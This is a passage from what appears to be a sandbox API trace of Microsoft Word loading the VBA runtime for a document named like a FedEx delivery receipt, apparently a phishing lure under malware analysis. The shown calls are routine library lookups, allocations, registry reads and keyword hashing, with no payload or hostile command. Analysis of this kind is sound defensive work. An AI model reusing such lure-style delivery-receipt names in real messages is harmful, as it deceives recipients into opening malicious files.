GetProcAddress (hModule=0x7feffd80000, lpProcName="SafeArrayCopyData") returned 0x7feffd860b0 [0040.842] GetProcAddress (hModule=0x7feffd80000, lpProcName="SafeArrayAllocDescriptorEx") returned 0x7feffd83e90 [0040.843] GetProcAddress (hModule=0x7feffd80000, lpProcName="SafeArrayCreateEx") returned 0x7feffdd9f80 [0040.843] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarFormat") returned 0x7feffe09b20 [0040.843] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarFormatDateTime") returned 0x7feffe09aa0 [0040.843] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarFormatNumber") returned 0x7feffe09990 [0040.844] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarFormatPercent") returned 0x7feffe09890 [0040.844] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarFormatCurrency") returned 0x7feffe09770 [0040.844] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarWeekdayName") returned 0x7feffdeb8d0 [0040.845] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarMonthName") returned 0x7feffdeb800 [0040.845] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarAdd") returned 0x7feffe048e0 [0040.845] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarAnd") returned 0x7feffe09470 [0040.846] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarCat") returned 0x7feffe096a0 [0040.846] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarDiv") returned 0x7feffe02fe0 [0040.846] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarEqv") returned 0x7feffe09cf0 [0040.846] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarIdiv") returned 0x7feffe08ff0 [0040.847] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarImp") returned 0x7feffe09c00 [0040.847] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarMod") returned 0x7feffe08e60 [0040.847] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarMul") returned 0x7feffe03690 [0040.848] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarOr") returned 0x7feffe092d0 [0040.848] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarPow") returned 0x7feffe02e80 [0040.848] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarSub") returned 0x7feffe03f90 [0040.848] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarXor") returned 0x7feffe091a0 [0040.849] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarAbs") returned 0x7feffde7c30 [0040.849] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarFix") returned 0x7feffde7a60 [0040.849] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarInt") returned 0x7feffde7890 [0040.849] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarNeg") returned 0x7feffde7ea0 [0040.850] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarNot") returned 0x7feffe09600 [0040.850] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarRound") returned 0x7feffde76a0 [0040.850] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarCmp") returned 0x7feffe083f0 [0040.851] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarDecAdd") returned 0x7feffdb3070 [0040.851] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarDecCmp") returned 0x7feffdbd700 [0040.851] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarBstrCat") returned 0x7feffdbd890 [0040.852] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarCyMulI4") returned 0x7feffd9caf0 [0040.852] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarBstrCmp") returned 0x7feffda8a00 [0040.853] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x691f3e0 [0040.853] GetUserDefaultLCID () returned 0x409 [0040.863] IMalloc:Alloc (This=0x7feffc15380, cb=0x3c) returned 0x680cff0 [0040.863] IMalloc:Alloc (This=0x7feffc15380, cb=0x38) returned 0x6983950 [0040.863] IMalloc:Alloc (This=0x7feffc15380, cb=0x20000*=0x78746341) returned 0x6b5ee20 [0040.864] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x691f320 [0040.865] IMalloc:Alloc (This=0x7feffc15380, cb=0x7d8) returned 0x6b7ee30 [0040.866] IMalloc:Alloc (This=0x7feffc15380, cb=0x98) returned 0x6a18810 [0040.866] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x691f350 [0040.870] IMalloc:Alloc (This=0x7feffc15380, cb=0x28) returned 0x696bf90 [0040.923] lstrcmpiW (lpString1="C:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", lpString2="") returned 1 [0040.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", cchWideChar=-1, lpMultiByteStr=0x187c00, cbMultiByte=103, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", lpUsedDefaultChar=0x0) returned 52 [0040.924] lstrlenA (lpString="C:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 51 [0040.924] lstrcpyA (in: lpString1=0x4ddc750, lpString2="C:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc" | out: lpString1="C:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned="C:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc" [0040.924] SetCursor (hCursor=0x10007) returned 0x10007 [0040.924] GetCurrentThreadId () returned 0x8c0 [0040.924] GetCurrentThreadId () returned 0x8c0 [0040.924] IMalloc:Alloc (This=0x7feffc15380, cb=0x4) returned 0x6b0a360 [0040.925] IMalloc:Alloc (This=0x7feffc15380, cb=0xf0) returned 0x6938840 [0040.925] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9bda0 [0040.925] IMalloc:Alloc (This=0x7feffc15380, cb=0x280) returned 0x3d6cbc0 [0040.926] IMalloc:Alloc (This=0x7feffc15380, cb=0xa08) returned 0x6ba8f50 [0040.926] IMalloc:Alloc (This=0x7feffc15380, cb=0x1738) returned 0x6bb19a0 [0040.926] GetLocalTime (in: lpSystemTime=0x187408 | out: lpSystemTime=0x187408*(wYear=0x7e2, wMonth=0xc, wDayOfWeek=0x4, wDay=0x6, wHour=0x16, wMinute=0x1a, wSecond=0x20, wMilliseconds=0x1b1)) [0040.926] _ultow_s (in: _Value=0x5de83298, _Buffer=0x3d6cbea, _BufferCount=0x103, _Radix=16 | out: _Buffer="5de83298") returned 0x0 [0040.926] wcsncpy_s (in: _Destination=0x1870d0, _SizeInWords=0x108, _Source="*\\Z005de83298", _MaxCount=0x106 | out: _Destination="*\\Z005de83298") returned 0x0 [0040.926] CharLowerBuffW (in: lpsz="*\\Z005de83298", cchLength=0xd | out: lpsz="*\\z005de83298") returned 0xd [0040.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z005de83298", cchWideChar=14, lpMultiByteStr=0x187000, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z005de83298", lpUsedDefaultChar=0x0) returned 14 [0040.926] wcscpy_s (in: _Destination=0x6b9bdc0, _SizeInWords=0xe, _Source="*\\Z005de83298" | out: _Destination="*\\Z005de83298") returned 0x0 [0040.926] wcsncpy_s (in: _Destination=0x187110, _SizeInWords=0x108, _Source="*\\Z005de83298", _MaxCount=0x106 | out: _Destination="*\\Z005de83298") returned 0x0 [0040.926] CharLowerBuffW (in: lpsz="*\\Z005de83298", cchLength=0xd | out: lpsz="*\\z005de83298") returned 0xd [0040.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z005de83298", cchWideChar=14, lpMultiByteStr=0x187040, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z005de83298", lpUsedDefaultChar=0x0) returned 14 [0040.926] lstrcpyA (in: lpString1=0x4ddc790, lpString2="C:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc" | out: lpString1="C:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned="C:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc" [0040.926] lstrcpyA (in: lpString1=0x4ddc790, lpString2="C:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc" | out: lpString1="C:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned="C:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc" [0040.926] lstrcpyA (in: lpString1=0x4ddc790, lpString2="C:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc" | out: lpString1="C:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned="C:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc" [0040.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4ddc790, cbMultiByte=-1, lpWideCharStr=0x187a70, cchWideChar=52 | out: lpWideCharStr="C:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 52 [0040.926] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0040.926] wcscpy_s (in: _Destination=0x187816, _SizeInWords=0x105, _Source="C:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc" | out: _Destination="C:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0x0 [0040.926] wcsncpy_s (in: _Destination=0x187430, _SizeInWords=0x108, _Source="*\\Z005de83298", _MaxCount=0x106 | out: _Destination="*\\Z005de83298") returned 0x0 [0040.926] CharLowerBuffW (in: lpsz="*\\Z005de83298", cchLength=0xd | out: lpsz="*\\z005de83298") returned 0xd [0040.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z005de83298", cchWideChar=14, lpMultiByteStr=0x187360, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z005de83298", lpUsedDefaultChar=0x0) returned 14 [0040.926] _wcsicmp (_String1="*\\Z005de83298", _String2="*\\Z005de83298") returned 0 [0040.926] wcsncpy_s (in: _Destination=0x187430, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0x0 [0040.926] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", cchLength=0x36 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc") returned 0x36 [0040.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc", cchWideChar=55, lpMultiByteStr=0x187360, cbMultiByte=110, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc", lpUsedDefaultChar=0x0) returned 55 [0040.926] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b9bda0, cb=0x100) returned 0x6ba2b80 [0040.927] wcscpy_s (in: _Destination=0x6ba2bc0, _SizeInWords=0x37, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc" | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0x0 [0040.927] wcsncpy_s (in: _Destination=0x187430, _SizeInWords=0x108, _Source="*\\Z005de83298", _MaxCount=0x106 | out: _Destination="*\\Z005de83298") returned 0x0 [0040.927] CharLowerBuffW (in: lpsz="*\\Z005de83298", cchLength=0xd | out: lpsz="*\\z005de83298") returned 0xd [0040.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z005de83298", cchWideChar=14, lpMultiByteStr=0x187360, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z005de83298", lpUsedDefaultChar=0x0) returned 14 [0040.927] _wcsicmp (_String1="*\\Z005de83298", _String2="*\\Z005de83298") returned 0 [0040.927] wcsncpy_s (in: _Destination=0x187470, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0x0 [0040.927] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", cchLength=0x36 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc") returned 0x36 [0040.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc", cchWideChar=55, lpMultiByteStr=0x1873a0, cbMultiByte=110, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc", lpUsedDefaultChar=0x0) returned 55 [0040.927] wcscpy_s (in: _Destination=0x3d6cbe0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc" | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0x0 [0040.927] CExposedDocFile::AddRef () returned 0x2 [0040.927] CExposedDocFile::OpenStorage () returned 0x0 [0040.927] CExposedDocFile::AddRef () returned 0x2 [0040.927] IMalloc:Alloc (This=0x7feffc15380, cb=0x84) returned 0x6b9bda0 [0040.927] wcscpy_s (in: _Destination=0x6b9be10, _SizeInWords=0x7, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0040.927] wcscpy_s (in: _Destination=0x186d10, _SizeInWords=0x40, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0040.927] _ltow_s (in: _Value=0, _Buffer=0x186d1c, _BufferCount=0x3a, _Radix=16 | out: _Buffer="0") returned 0x0 [0040.927] CExposedDocFile::OpenStream () returned 0x80030002 [0040.928] IMalloc:Free (This=0x7feffc15380, pv=0x6b9bda0) [0040.928] longjmp () [0040.932] IMalloc:Alloc (This=0x7feffc15380, cb=0x84) returned 0x6b9bda0 [0040.932] wcscpy_s (in: _Destination=0x6b9be10, _SizeInWords=0x7, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0040.932] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x180) returned 0x6ad97a0 [0040.932] IMalloc:Alloc (This=0x7feffc15380, cb=0xb8) returned 0x6b0c860 [0040.932] IMalloc:Alloc (This=0x7feffc15380, cb=0xb8) returned 0x6b0c7a0 [0040.932] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6a7c110 [0040.932] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x80) returned 0x6b9ce80 [0040.932] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6a7c360 [0040.932] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6a7c5b0 [0040.932] IMalloc:Alloc (This=0x7feffc15380, cb=0x28) returned 0x68f0390 [0040.933] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6b244c0 [0040.933] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x186d0c, cchData=6 | out: lpLCData="1252") returned 5 [0040.933] atoi (_Str="1252") returned 1252 [0040.933] GetLocalTime (in: lpSystemTime=0x186d00 | out: lpSystemTime=0x186d00*(wYear=0x7e2, wMonth=0xc, wDayOfWeek=0x4, wDay=0x6, wHour=0x16, wMinute=0x1a, wSecond=0x20, wMilliseconds=0x1c0)) [0040.933] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9cf10 [0040.933] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6b0a370 [0040.933] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9cfa0 [0040.933] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68ef700 [0040.933] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9d030 [0040.933] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b9d030, cb=0x280) returned 0x3d6ce50 [0040.933] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6b0a2e0 [0040.933] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6b0a3a0 [0040.933] strcpy_s (in: _Dst=0x186ae0, _DstSize=0xc8, _Src="Software\\Microsoft\\VBA\\" | out: _Dst="Software\\Microsoft\\VBA\\") returned 0x0 [0040.933] strcat_s (in: _Destination="Software\\Microsoft\\VBA\\", _SizeInBytes=0xc8, _Source="7.1\\Common" | out: _Destination="Software\\Microsoft\\VBA\\7.1\\Common") returned 0x0 [0040.933] RegCreateKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x7fee46104a8, lpdwDisposition=0x0 | out: phkResult=0x7fee46104a8*=0x9d8, lpdwDisposition=0x0) returned 0x0 [0040.934] RegQueryValueExA (in: hKey=0x9d8, lpValueName="RequireDeclaration", lpReserved=0x0, lpType=0x186bb8, lpData=0x186bb0, lpcbData=0x186bb4*=0x4 | out: lpType=0x186bb8*=0x0, lpData=0x186bb0*=0x48, lpcbData=0x186bb4*=0x4) returned 0x2 [0040.934] RegQueryValueExA (in: hKey=0x9d8, lpValueName="CompileOnDemand", lpReserved=0x0, lpType=0x186bb8, lpData=0x186bb0, lpcbData=0x186bb4*=0x4 | out: lpType=0x186bb8*=0x0, lpData=0x186bb0*=0x0, lpcbData=0x186bb4*=0x4) returned 0x2 [0040.934] RegQueryValueExA (in: hKey=0x9d8, lpValueName="NotifyUserBeforeStateLoss", lpReserved=0x0, lpType=0x186bb8, lpData=0x186bb0, lpcbData=0x186bb4*=0x4 | out: lpType=0x186bb8*=0x0, lpData=0x186bb0*=0x1, lpcbData=0x186bb4*=0x4) returned 0x2 [0040.934] RegQueryValueExA (in: hKey=0x9d8, lpValueName="BackGroundCompile", lpReserved=0x0, lpType=0x186bb8, lpData=0x186bb0, lpcbData=0x186bb4*=0x4 | out: lpType=0x186bb8*=0x0, lpData=0x186bb0*=0x0, lpcbData=0x186bb4*=0x4) returned 0x2 [0040.934] RegQueryValueExA (in: hKey=0x9d8, lpValueName="BreakOnAllErrors", lpReserved=0x0, lpType=0x186bb8, lpData=0x186bb0, lpcbData=0x186bb4*=0x4 | out: lpType=0x186bb8*=0x0, lpData=0x186bb0*=0xff, lpcbData=0x186bb4*=0x4) returned 0x2 [0040.934] RegQueryValueExA (in: hKey=0x9d8, lpValueName="BreakOnServerErrors", lpReserved=0x0, lpType=0x186bb8, lpData=0x186bb0, lpcbData=0x186bb4*=0x4 | out: lpType=0x186bb8*=0x0, lpData=0x186bb0*=0x0, lpcbData=0x186bb4*=0x4) returned 0x2 [0040.934] RegCloseKey (hKey=0x9d8) returned 0x0 [0040.934] IMalloc:Alloc (This=0x7feffc15380, cb=0xc0) returned 0x6b97580 [0040.934] IMalloc:Alloc (This=0x7feffc15380, cb=0xc0) returned 0x6b978c0 [0040.934] IMalloc:Alloc (This=0x7feffc15380, cb=0x1300) returned 0x6bb30e0 [0040.934] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x2d60000 [0040.935] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x2000, flProtect=0x4) returned 0x3ac0000 [0040.936] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0040.936] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x30) returned 0x698b2d0 [0040.936] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x2d70000 [0040.936] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Object") returned 0x102ec1 [0040.936] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0040.937] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x2e10000 [0040.937] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x30e0000 [0040.937] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Intrinsics") returned 0x109464 [0040.938] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x30f0000 [0040.938] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unknown") returned 0x10a11d [0040.938] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="") returned 0x10c0b3 [0040.938] CExposedDocFile::OpenStream () returned 0x0 [0040.938] IMalloc:Alloc (This=0x7feffc15380, cb=0x420) returned 0x26087f0 [0040.939] CExposedStream::AddRef () returned 0x2 [0040.939] CExposedStream::Release () returned 0x1 [0040.939] CExposedStream::Read () returned 0x0 [0040.939] GetProcAddress (hModule=0x7fee3a50000, lpProcName=0x7fee45db088) returned 0x7fee3a5fcd0 [0040.939] VirtualAlloc (lpAddress=0x0, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x3880000 [0040.939] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x2000, flProtect=0x4) returned 0x3b00000 [0040.940] CExposedDocFile::CreateStream () returned 0x0 [0040.940] IMalloc:Alloc (This=0x7feffc15380, cb=0x420) returned 0x6bb43f0 [0040.940] CExposedStream::AddRef () returned 0x2 [0040.940] CExposedStream::Release () returned 0x1 [0040.940] CExposedStream::Release () returned 0x0 [0040.940] IMalloc:Free (This=0x7feffc15380, pv=0x6bb43f0) [0040.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0040.940] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x30) returned 0x698a290 [0040.940] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x38a0000 [0040.940] VirtualAlloc (lpAddress=0x3b00000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x3b00000 [0040.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Abs") returned 0x1072bc [0040.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Access") returned 0x101d98 [0040.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AddressOf") returned 0x10e252 [0040.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Alias") returned 0x10bf6d [0040.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0040.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Any") returned 0x10747a [0040.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Append") returned 0x108f83 [0040.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Array") returned 0x109183 [0040.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0040.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Assert") returned 0x1096e9 [0040.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="B") returned 0x101059 [0040.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Base") returned 0x10afa9 [0040.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BF") returned 0x105ca5 [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Binary") returned 0x1008a0 [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Boolean") returned 0x10978e [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByRef") returned 0x1074ef [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Byte") returned 0x101a83 [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByVal") returned 0x1089c5 [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Call") returned 0x10744b [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Case") returned 0x107547 [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CBool") returned 0x104c74 [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CByte") returned 0x106d3c [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CCur") returned 0x108050 [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDate") returned 0x108dc3 [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDec") returned 0x10834a [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDbl") returned 0x1082e4 [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDecl") returned 0x10a0b9 [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ChDir") returned 0x10b2fb [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CInt") returned 0x109f65 [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Circle") returned 0x103fd1 [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLng") returned 0x10af63 [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Close") returned 0x1005ab [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Compare") returned 0x10af82 [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Const") returned 0x10517a [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CSng") returned 0x10d4d2 [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CStr") returned 0x10d5bb [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir") returned 0x101bab [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir$") returned 0x10f7cc [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir") returned 0x101bab [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVar") returned 0x10e307 [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVDate") returned 0x10cfd6 [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVErr") returned 0x108902 [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Currency") returned 0x10f106 [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Database") returned 0x10eec7 [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date") returned 0x103b0a [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date$") returned 0x1031c7 [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date") returned 0x103b0a [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Debug") returned 0x10eaee [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Decimal") returned 0x1036dd [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Declare") returned 0x104a38 [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefBool") returned 0x1091ad [0040.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefByte") returned 0x10b275 [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefCur") returned 0x10cc45 [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDate") returned 0x10d2fc [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDec") returned 0x10cf3f [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDbl") returned 0x10ced9 [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefInt") returned 0x10eb5a [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLng") returned 0x10fb58 [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefObj") returned 0x10096b [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefSng") returned 0x102088 [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefStr") returned 0x102171 [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefVar") returned 0x102ebd [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir") returned 0x1083c9 [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir$") returned 0x106567 [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir") returned 0x1083c9 [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Do") returned 0x105cf8 [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, 